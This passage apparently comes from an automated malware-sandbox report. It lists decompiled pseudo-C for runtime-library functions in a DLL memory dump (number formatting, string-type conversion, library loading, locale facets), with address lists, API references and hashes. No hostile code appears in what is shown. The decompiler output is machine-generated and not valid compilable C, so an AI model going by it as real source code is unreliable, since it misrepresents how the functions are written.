								_t119 = E6D4E75C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E6D4E75C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t116 = _t186 - 1;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E6D4A39C0(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E6D4E75C0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E6D4E7640();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E6D4E7640();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E6D4E7640();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E6D4CF648(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E6D4E78B0(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E6D4C2281();
					_t183 = 0x22;
					 *_t129 = _t183;
					E6D4C215B();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}

0x6d4cf345
0x6d4cf350
0x6d4cf357
0x6d4cf359
0x6d4cf359
0x6d4cf35b
0x6d4cf364
0x6d4cf366
0x6d4cf36b
0x6d4cf371
0x6d4cf387
0x6d4cf38c
0x6d4cf38f
0x6d4cf39c
0x6d4cf3a1
0x6d4cf3f5
0x6d4cf3fd
0x6d4cf3ff
0x6d4cf401
0x6d4cf404
0x6d4cf404
0x6d4cf404
0x6d4cf40a
0x6d4cf412
0x6d4cf425
0x6d4cf428
0x6d4cf42a
0x6d4cf42d
0x6d4cf42e
0x6d4cf44f
0x6d4cf452
0x6d4cf452
0x6d4cf430
0x6d4cf430
0x6d4cf432
0x6d4cf43d
0x6d4cf43d
0x6d4cf43f
0x6d4cf446
0x6d4cf441
0x6d4cf441
0x6d4cf441
0x6d4cf43f
0x6d4cf453
0x6d4cf455
0x6d4cf456
0x6d4cf459
0x6d4cf45b
0x6d4cf465
0x6d4cf46f
0x6d4cf45d
0x6d4cf45d
0x6d4cf45d
0x6d4cf474
0x6d4cf474
0x6d4cf479
0x6d4cf47c
0x6d4cf487
0x6d4cf487
0x6d4cf487
0x6d4cf487
0x6d4cf48b
0x6d4cf492
0x6d4cf493
0x6d4cf496
0x6d4cf499
0x6d4cf499
0x6d4cf49b
0x00000000
0x00000000
0x6d4cf4b3
0x6d4cf4ba
0x6d4cf4be
0x6d4cf4c1
0x6d4cf4c4
0x6d4cf4c6
0x6d4cf4c6
0x6d4cf4c6
0x6d4cf4c8
0x6d4cf4cb
0x6d4cf4ce
0x6d4cf4d0
0x6d4cf4d8
0x6d4cf4de
0x6d4cf4e1
0x6d4cf4e4
0x6d4cf4e5
0x6d4cf4e8
0x6d4cf4eb
0x6d4cf4eb
0x6d4cf4f0
0x6d4cf4f3
0x00000000
0x00000000
0x6d4cf50b
0x6d4cf510
0x6d4cf514
0x00000000
0x00000000
0x6d4cf518
0x6d4cf51b
0x6d4cf51c
0x6d4cf51c
0x6d4cf51e
0x6d4cf521
0x00000000
0x00000000
0x6d4cf523
0x6d4cf526
0x6d4cf52d
0x6d4cf530
0x6d4cf533
0x6d4cf549
0x6d4cf549
0x6d4cf549
0x6d4cf535
0x6d4cf535
0x6d4cf537
0x6d4cf53a
0x6d4cf545
0x6d4cf53c
0x6d4cf53f
0x6d4cf53f
0x6d4cf53a
0x00000000
0x6d4cf533
0x6d4cf528
0x6d4cf528
0x6d4cf52a
0x6d4cf52a
0x6d4cf47e
0x6d4cf47e
0x6d4cf481
0x6d4cf54c
0x6d4cf54c
0x6d4cf54e
0x6d4cf550
0x6d4cf553
0x6d4cf554
0x6d4cf555
0x6d4cf556
0x6d4cf55e
0x6d4cf55e
0x6d4cf55e
0x6d4cf560
0x6d4cf563
0x6d4cf566
0x6d4cf568
0x6d4cf568
0x6d4cf56a
0x6d4cf57c
0x6d4cf580
0x6d4cf583
0x6d4cf58a
0x6d4cf592
0x6d4cf592
0x6d4cf595
0x6d4cf597
0x6d4cf5a8
0x6d4cf5a8
0x6d4cf5ac
0x6d4cf5ac
0x6d4cf5af
0x6d4cf5b1
0x6d4cf5b4
0x00000000
0x6d4cf599
0x6d4cf599
0x6d4cf59f
0x6d4cf59f
0x6d4cf5a3
0x6d4cf5b6
0x6d4cf5b6
0x6d4cf5ba
0x6d4cf5bb
0x6d4cf5bd
0x6d4cf5bf
0x6d4cf600
0x6d4cf600
0x6d4cf602
0x6d4cf60f
0x6d4cf60f
0x6d4cf611
0x6d4cf613
0x6d4cf614
0x6d4cf615
0x6d4cf61c
0x6d4cf61f
0x6d4cf621
0x6d4cf621
0x6d4cf622
0x6d4cf624
0x6d4cf627
0x6d4cf627
0x6d4cf629
0x6d4cf62b
0x00000000
0x6d4cf62b
0x6d4cf604
0x6d4cf606
0x00000000
0x00000000
0x6d4cf608
0x00000000
0x00000000
0x6d4cf60a
0x6d4cf60d
0x00000000
0x00000000
0x00000000
0x6d4cf60d
0x6d4cf5c6
0x6d4cf5cc
0x6d4cf5cc
0x6d4cf5ce
0x6d4cf5cf
0x6d4cf5d0
0x6d4cf5d1
0x6d4cf5d8
0x6d4cf5db
0x6d4cf5dd
0x6d4cf5de
0x6d4cf5e0
0x6d4cf5ed
0x6d4cf5ed
0x6d4cf5ef
0x6d4cf5f1
0x6d4cf5f2
0x6d4cf5f3
0x6d4cf5fa
0x6d4cf5fd
0x6d4cf5ff
0x6d4cf5ff
0x00000000
0x6d4cf5ff
0x6d4cf5e2
0x6d4cf5e2
0x6d4cf5e4
0x00000000
0x00000000
0x6d4cf5e6
0x00000000
0x00000000
0x6d4cf5e8
0x6d4cf5eb
0x00000000
0x00000000
0x00000000
0x6d4cf5eb
0x6d4cf5c8
0x6d4cf5ca
0x00000000
0x00000000
0x00000000
0x6d4cf5ca
0x6d4cf59b
0x6d4cf59d
0x00000000
0x00000000
0x00000000
0x6d4cf59d
0x6d4cf597
0x00000000
0x6d4cf481
0x6d4cf47c
0x6d4cf3a3
0x6d4cf3a5
0x00000000
0x6d4cf3a7
0x6d4cf3bd
0x6d4cf3c2
0x6d4cf3c4
0x6d4cf3d0
0x6d4cf3d6
0x6d4cf3d7
0x6d4cf3d9
0x6d4cf3db
0x6d4cf3e6
0x6d4cf3e6
0x6d4cf3e9
0x6d4cf3eb
0x6d4cf3eb
0x6d4cf3ee
0x6d4cf3c6
0x6d4cf3c6
0x6d4cf3c6
0x00000000
0x6d4cf3c4
0x6d4cf373
0x6d4cf373
0x6d4cf37a
0x6d4cf37b
0x6d4cf37d
0x6d4cf62f
0x6d4cf633
0x6d4cf638
0x6d4cf638
0x6d4cf647
0x6d4cf647

APIs

_strrchr.LIBCMT ref: 6D4CF3D0
__alldvrm.LIBCMT ref: 6D4CF5D1
__alldvrm.LIBCMT ref: 6D4CF5F3

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 6deae34975e8103ed65886de447e5f7072f6a5271229e2bb310e9ca1a4878613
Instruction ID: e84c5f9495c90dacea5f072cab6b042dba9c3e0a2602624e26f1d6188bea8fbe
Opcode Fuzzy Hash: 6deae34975e8103ed65886de447e5f7072f6a5271229e2bb310e9ca1a4878613
Instruction Fuzzy Hash: E9A1587AA0B2469FE701CE58C890FBABBE4EF55354F2841ADD6849B381C33C8D42C752

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D6102, Relevance: 6.1, APIs: 4, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6D4D6102(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __esi;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t68;
				signed int _t69;
				short* _t70;

				_t65 = __edx;
				_t34 =  *0x6d54506c; // 0xff2bc58a
				_v8 = _t34 ^ _t69;
				E6D4B1F60(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0xc0b0a09
					_t53 =  *_t6;
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E6D49F8A5(_v8 ^ _t69, _t65, _t68);
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0xc
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t68 = 0;
					L11:
					if(_t68 != 0) {
						E6D4A39C0(_t67, _t68, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t68, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t68, _t46, _a20);
						}
					}
					L14:
					E6D48DEE1(_t68);
					goto L15;
				}
				_t20 = _t55 + 8; // 0xc
				asm("sbb eax, eax");
				_t48 = _t40 & _t20;
				_t21 = _t55 + 8; // 0xc
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t68 = E6D4CF26D(_t63, _t48 & _t63);
					if(_t68 == 0) {
						goto L14;
					}
					 *_t68 = 0xdddd;
					L9:
					_t68 =  &(_t68[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E6D4A01B0();
				_t68 = _t70;
				if(_t68 == 0) {
					goto L14;
				}
				 *_t68 = 0xcccc;
				goto L9;
			}

0x6d4d6102
0x6d4d610a
0x6d4d6111
0x6d4d611d
0x6d4d6122
0x6d4d6127
0x6d4d612c
0x6d4d612c
0x6d4d612f
0x6d4d6131
0x6d4d6131
0x6d4d6136
0x6d4d614f
0x6d4d6155
0x6d4d615a
0x6d4d61f9
0x6d4d61fd
0x6d4d6202
0x6d4d6202
0x6d4d621e
0x6d4d621e
0x6d4d6160
0x6d4d6163
0x6d4d6168
0x6d4d616c
0x6d4d61b8
0x6d4d61ba
0x6d4d61bc
0x6d4d61c1
0x6d4d61d8
0x6d4d61e0
0x6d4d61f0
0x6d4d61f0
0x6d4d61e0
0x6d4d61f2
0x6d4d61f3
0x00000000
0x6d4d61f8
0x6d4d616e
0x6d4d6173
0x6d4d6175
0x6d4d6177
0x6d4d6177
0x6d4d617f
0x6d4d619c
0x6d4d61a6
0x6d4d61ab
0x00000000
0x00000000
0x6d4d61ad
0x6d4d61b3
0x6d4d61b3
0x00000000
0x6d4d61b3
0x6d4d6183
0x6d4d6187
0x6d4d618c
0x6d4d6190
0x00000000
0x00000000
0x6d4d6192
0x00000000

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,6D4F0EA8,00000000,00000000,008B018B,6D4CDA1E,?,00000004,00000001,6D4F0EA8,0000007F,?,008B018B,00000001), ref: 6D4D614F
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6D4D61D8
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6D4D61EA
__freea.LIBCMT ref: 6D4D61F3

Part of subcall function 6D4CF26D: RtlAllocateHeap.NTDLL(00000000,6D4875D9,00000000,?,6D4A0F8B,00000002,00000000,?,?,?,6D461298,6D4875D9,00000004,00000000,00000000,00000000), ref: 6D4CF29F

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 441b3ae1c5d5e603210f2121a466b0dc3e951f9d510202b3f440791a303e5d91
Instruction ID: 760bad91731f46043f85261fbed3293d554a65bb21d8f4e7c5aa90fbb51927c4
Opcode Fuzzy Hash: 441b3ae1c5d5e603210f2121a466b0dc3e951f9d510202b3f440791a303e5d91
Instruction Fuzzy Hash: D131BA72A0021AABDF15CFA8CC95EAE7BA5EF41714F15412DE814DA241EB35CC55CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D3E7F, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E6D4D3E7F(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x6d547908 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x6d4f1690 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xff2bc58b
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x6d4d3e84
0x6d4d3e88
0x6d4d3e8f
0x6d4d3e93
0x6d4d3ea1
0x6d4d3eb7
0x6d4d3ebb
0x6d4d3ee4
0x6d4d3ee6
0x6d4d3eea
0x6d4d3eed
0x6d4d3eed
0x6d4d3ef3
0x6d4d3ef5
0x00000000
0x6d4d3ef6
0x6d4d3ebd
0x6d4d3ec6
0x6d4d3ed5
0x6d4d3ec8
0x6d4d3ecb
0x6d4d3ed1
0x6d4d3ed1
0x6d4d3ed9
0x00000000
0x6d4d3edb
0x6d4d3ede
0x6d4d3ee0
0x00000000
0x6d4d3ee0
0x6d4d3ed9
0x6d4d3e95
0x6d4d3e9a
0x00000000

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,6D4D3E26,?,00000000,00000000,00000000,?,6D4D41BD,00000006,FlsSetValue), ref: 6D4D3EB1
GetLastError.KERNEL32(?,6D4D3E26,?,00000000,00000000,00000000,?,6D4D41BD,00000006,FlsSetValue,6D4F1C58,FlsSetValue,00000000,00000364,?,6D4CD6D1), ref: 6D4D3EBD
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,6D4D3E26,?,00000000,00000000,00000000,?,6D4D41BD,00000006,FlsSetValue,6D4F1C58,FlsSetValue,00000000), ref: 6D4D3ECB

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: d2f14acbd8f8f69f2a35fa444f64068a14ae5e8811faf2524539db17c00bb9db
Instruction ID: f4ba6cba7c2a47aa563db4f848440b999e66e29c8bbdbb2bce5cb9491b7e5270
Opcode Fuzzy Hash: d2f14acbd8f8f69f2a35fa444f64068a14ae5e8811faf2524539db17c00bb9db
Instruction Fuzzy Hash: 8E01F732755233AFCB529A699C5DF57B7B8AF067A17200220F909D32C1DB21DC01C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 6D491558, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6D491558(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t15;
				intOrPtr _t17;
				void* _t20;
				intOrPtr* _t32;
				void* _t35;

				E6D4A00AC(0x6d4e8a31, __ebx, __edi, __esi, 0x3c);
				_t32 =  *((intOrPtr*)(_t35 + 8));
				_t34 = 0;
				_t23 = 0;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				if(_t32 != 0) {
					_t37 =  *_t32;
					if( *_t32 == 0) {
						_push(0x44);
						_t17 = E6D49F8B6(__edx, 0, _t37);
						 *((intOrPtr*)(_t35 - 0x14)) = _t17;
						 *((intOrPtr*)(_t35 - 4)) = 0;
						if(_t17 != 0) {
							_push(E6D461703( *((intOrPtr*)(_t35 + 0xc))));
							_t20 = E6D461450(0, _t35 - 0x48, __edx, _t32, 0);
							_t23 = 1;
							_push(0);
							_push(_t20);
							 *((char*)(_t35 - 4)) = 1;
							 *((intOrPtr*)(_t35 - 0x10)) = 1;
							_t34 = E6D490143( *((intOrPtr*)(_t35 - 0x14)), 0);
						}
						 *_t32 = _t34;
						if((_t23 & 0x00000001) != 0) {
							E6D4614CE(_t35 - 0x48);
						}
					}
				}
				_t15 = 5;
				return E6D4A0075(_t15);
			}

0x6d49155f
0x6d491564
0x6d491567
0x6d491569
0x6d49156b
0x6d491570
0x6d491572
0x6d491574
0x6d491576
0x6d491578
0x6d49157e
0x6d491581
0x6d491586
0x6d491590
0x6d491594
0x6d49159c
0x6d49159d
0x6d49159e
0x6d49159f
0x6d4915a2
0x6d4915aa
0x6d4915aa
0x6d4915ac
0x6d4915b1
0x6d4915b6
0x6d4915b6
0x6d4915b1
0x6d491574
0x6d4915bd
0x6d4915c3

APIs

__EH_prolog3.LIBCMT ref: 6D49155F
std::_Locinfo::_Locinfo.LIBCPMT ref: 6D491594

Part of subcall function 6D461450: __EH_prolog3.LIBCMT ref: 6D461457
Part of subcall function 6D461450: std::_Lockit::_Lockit.LIBCPMT ref: 6D461464
Part of subcall function 6D461450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6D4614A1

numpunct.LIBCPMT ref: 6D4915A5

Part of subcall function 6D490143: __EH_prolog3.LIBCMT ref: 6D49014A

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6D4915B6

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: da37b0c1d815d01687348baee13540f273d374dfde44b68e7f6bc7d91fa03bac
Instruction ID: 6ecec4f7b5bb96e8e0e965ae0d991fa729d6195df90b5ac8e4ba5522e89d6ea9
Opcode Fuzzy Hash: da37b0c1d815d01687348baee13540f273d374dfde44b68e7f6bc7d91fa03bac
Instruction Fuzzy Hash: 06016271945216DEDB00CB95C850EAD7B74AF54765F620119E65AAB284CBB04E01C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4914EC, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6D4914EC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t15;
				intOrPtr _t17;
				void* _t20;
				intOrPtr* _t32;
				void* _t35;

				E6D4A00AC(0x6d4e8a31, __ebx, __edi, __esi, 0x3c);
				_t32 =  *((intOrPtr*)(_t35 + 8));
				_t34 = 0;
				_t23 = 0;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				if(_t32 != 0) {
					_t37 =  *_t32;
					if( *_t32 == 0) {
						_push(0x44);
						_t17 = E6D49F8B6(__edx, 0, _t37);
						 *((intOrPtr*)(_t35 - 0x14)) = _t17;
						 *((intOrPtr*)(_t35 - 4)) = 0;
						if(_t17 != 0) {
							_push(E6D461703( *((intOrPtr*)(_t35 + 0xc))));
							_t20 = E6D461450(0, _t35 - 0x48, __edx, _t32, 0);
							_t23 = 1;
							_push(0);
							_push(_t20);
							 *((char*)(_t35 - 4)) = 1;
							 *((intOrPtr*)(_t35 - 0x10)) = 1;
							_t34 = E6D490110( *((intOrPtr*)(_t35 - 0x14)), 0);
						}
						 *_t32 = _t34;
						if((_t23 & 0x00000001) != 0) {
							E6D4614CE(_t35 - 0x48);
						}
					}
				}
				_t15 = 5;
				return E6D4A0075(_t15);
			}

0x6d4914f3
0x6d4914f8
0x6d4914fb
0x6d4914fd
0x6d4914ff
0x6d491504
0x6d491506
0x6d491508
0x6d49150a
0x6d49150c
0x6d491512
0x6d491515
0x6d49151a
0x6d491524
0x6d491528
0x6d491530
0x6d491531
0x6d491532
0x6d491533
0x6d491536
0x6d49153e
0x6d49153e
0x6d491540
0x6d491545
0x6d49154a
0x6d49154a
0x6d491545
0x6d491508
0x6d491551
0x6d491557

APIs

__EH_prolog3.LIBCMT ref: 6D4914F3
std::_Locinfo::_Locinfo.LIBCPMT ref: 6D491528

Part of subcall function 6D461450: __EH_prolog3.LIBCMT ref: 6D461457
Part of subcall function 6D461450: std::_Lockit::_Lockit.LIBCPMT ref: 6D461464
Part of subcall function 6D461450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6D4614A1

numpunct.LIBCPMT ref: 6D491539

Part of subcall function 6D490110: __EH_prolog3.LIBCMT ref: 6D490117

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6D49154A

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: 8fcb1b22ce8d2f05e9fcaaa992f4ebefbcf22410e5c43c6efbb1c6c4b022e42f
Instruction ID: 53f70a4b2cabe05823c58032475964ea69ad78a82bf228fc5605f89aaf93a7fb
Opcode Fuzzy Hash: 8fcb1b22ce8d2f05e9fcaaa992f4ebefbcf22410e5c43c6efbb1c6c4b022e42f
Instruction Fuzzy Hash: E6018671945226DFDB01CB99C840EAE7F75AF547A5F22011AE65ABB384CB704E01C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 6D49C229, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6D49C229(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t15;
				intOrPtr _t17;
				void* _t20;
				intOrPtr* _t32;
				void* _t35;

				E6D4A00AC(0x6d4e8a31, __ebx, __edi, __esi, 0x3c);
				_t32 =  *((intOrPtr*)(_t35 + 8));
				_t34 = 0;
				_t23 = 0;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				if(_t32 != 0) {
					_t37 =  *_t32;
					if( *_t32 == 0) {
						_push(0x44);
						_t17 = E6D49F8B6(__edx, 0, _t37);
						 *((intOrPtr*)(_t35 - 0x14)) = _t17;
						 *((intOrPtr*)(_t35 - 4)) = 0;
						if(_t17 != 0) {
							_push(E6D461703( *((intOrPtr*)(_t35 + 0xc))));
							_t20 = E6D461450(0, _t35 - 0x48, __edx, _t32, 0);
							_t23 = 1;
							_push(0);
							_push(_t20);
							 *((char*)(_t35 - 4)) = 1;
							 *((intOrPtr*)(_t35 - 0x10)) = 1;
							_t34 = E6D49BD9F( *((intOrPtr*)(_t35 - 0x14)), 0);
						}
						 *_t32 = _t34;
						if((_t23 & 0x00000001) != 0) {
							E6D4614CE(_t35 - 0x48);
						}
					}
				}
				_t15 = 5;
				return E6D4A0075(_t15);
			}

0x6d49c230
0x6d49c235
0x6d49c238
0x6d49c23a
0x6d49c23c
